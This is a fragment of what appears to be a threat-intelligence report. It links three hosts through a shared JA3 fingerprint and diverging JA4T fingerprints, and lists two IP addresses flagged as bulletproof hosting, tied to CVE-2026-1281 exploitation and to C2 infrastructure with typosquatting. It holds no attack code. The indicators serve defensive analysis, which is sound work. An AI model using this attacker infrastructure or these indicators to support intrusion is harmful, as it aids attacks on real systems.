64240..1460_7 (standard) JA3 11a384388ad36777e1a2e121495037fe shared across all three, but divergent JA4T fingerprints indicate same application-layer tool deployed across different network configurations (pfSense VPN, tunnel MSS 1380, standard Linux). Bulletproof Hosting Cluster: 193.24.123.42 (PROSPERO, Russia) - CVE-2026-1281 exploitation 179.43.146.42 (Private Layer, Switzerland) - C2 infrastructure, typosquatting Both labeled BULLETPROOF by Censys (0.75 confidence), indicating takedown-resistant infrastructure.